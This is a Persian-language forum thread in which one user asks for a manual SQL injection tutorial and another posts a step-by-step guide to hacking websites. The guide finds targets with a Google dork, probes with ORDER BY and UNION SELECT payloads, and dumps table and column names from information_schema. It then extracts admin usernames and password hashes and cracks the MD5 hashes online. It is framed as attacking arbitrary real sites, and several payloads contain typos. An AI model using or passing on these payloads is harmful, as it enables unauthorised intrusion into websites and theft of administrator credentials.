اموزش دستی sql

[Mr.Rex]

سلام دوستان اموزش هک سایت به روشsql  دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه 
مرسی

[GHOST]

سلام دوستان اموزش هک سایت به روشsql  دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه 

مرسی

سلام به همه...!ا

SQLامروز اومدم با هک سايت با باگ (اس کيو ال)ا

sqlنکته:براي هک سايت باگ هاي مختلفي است اما ما با باگ اموزش ميدم

نکته:براي فهميدن اين که سايت باگ (اس کيو ال) دارد يا نه

اخر اسم ان بايد اين باشد

faq.php?id=XX

به جاي 

xx

يک عدد

است

مثال:

This is the hidden content, please

• ورود
• یا
• ثبت نام

براي اينکه مطما بشيم بايد در اخر ان ( ' ) حرف را بگزاريم و اينتر بزنيم

حالا اگر ارور داد و در بين ارور ان اين حرف 

Sql

بود قابل هک اما اگه نبود ول کن بريم سايت بعدي

براي اينکه سايت هايي پيدا کنيم که

faq.php?id=XX

داشته باشد در گوگل سرچ کنيد

inurl:"php?id="

حالا بيشتر سايت هايي که مياد تقريبا قابل هک است

خوب بريم ادامه کار تا اينجا فرض ميکنيم در ارور حرف

SQl

بود

2________________________________

حالا در اخر اسم سايت ميزنيم

+order+by+X--

به جاي "ايکس" اعدادي ميگزاريم تا اخرين عدد را پيدا کنيم مثلا عدد5 سايت سالمه

6سالمه 7سالمه 8سالمه 9ارور ميده پس بايد انقدر عدد بديم تا بفهميم اخرين ستون کدام است

مثال

This is the hidden content, please

• ورود
• یا
• ثبت نام

3____________________________________________

خوب حالا ميخواهيم بفهميم کدام ستون نفوظ پزير است ميزنيم

+union+select+1,2,3,4,5,6,7,8,9,10--

از 1 شروع ميکنيم تا به اخرين عددي که در مرحله 2 پيدا کرديم

مثال

This is the hidden content, please

• ورود
• یا
• ثبت نام

در بالا ارور ميدهد چرا؟

بايد در قبل از 2

faq.php?id=2

يک (-)بزايم مثال

This is the hidden content, please

• ورود
• یا
• ثبت نام

حالا در همان سايت يک جواب ميدهد که در اين جواب يک عدد است

که اين عدد همان سوتون قابل نفوظ است

4__________________________________________________ 

براي پيدا کردن ورژن ديتل بيس ميزنيم

+union+select+1,2,3,version(),5,6,7,8,9,10--

نکته:در بالا من حرف ورژن را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد

(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است)

حالا جوابي ميايد به که ورژن را نوشته مثال

This is the hidden content, please

• ورود
• یا
• ثبت نام

5____________________________________

بدست اوردن ديتا بيس

+union+select+1,2,3,database(),5,6,7,8,9,10--

نکته:در بالا من حرف ديتا بيس را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد

(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است)

حالا جوابي ميايد که ديتابيس را نوشته

مثال

This is the hidden content, please

• ورود
• یا
• ثبت نام

6___________________________________________

گرفتن تيبل ادمين

اين مد را به اخر سايت اضافه ميکنيم تا نام :تيبل ها" را بدست اوريم

+union+select+1,group_concat(table_name),3,4+from+information_schema.tables-- 

حالا نام تيبل ها به رديف مياد ما بايد بنبال اين تيبل ها بگرديم

(admins,admin,user,users)يا نام هايي شبيه اين

اگر اينجور نام هارا نجستيد ديگه سايت به درد نميخوره بايد برين يک سايت ديگه

فرص کنيم حرف 

userبود

name tabel admin sait = "user"

7__________________________________________

بدست اوردن "کولدومن"هاي ادمين

اين کد را اخر سايت اضافه ميکنيم

union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=XXX--

XXXبه جاي

نام "تيبل"که در مرحله 6 بدست اورديد وارد کنيد

مثال

union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=user--

حالا نام تيبل هاي ادمين مياد

8_________________________________________________

بدست اوردن يوزر

+union+select+1,C,3,4_from+T--

T=Name table ke be dast avadid

C=name column ke be dast ovordid bedid 

((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان مولدووم هاي که نامشون شبيه يوزر است وارد کنيد))

9__________________________________________________

بدست اوردن پسوورد

+union+select+1,C,3,4_from+T--

T=Name table ke be dast avadid

C=name column ke be dast ovordid bedid 

((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان کولدووم هاي که نامشون شبيه پسوورد هست را بدهيد است وارد کنيد))

10_______________________________________

پسوردي که بدست مياد بشکل هاش کد مياد

براي اينک کد به صورت صبيعي شود وارد سايت

md5decrypter.co.uk

شويد 

و هاش کد بدست امده را وارد کنيد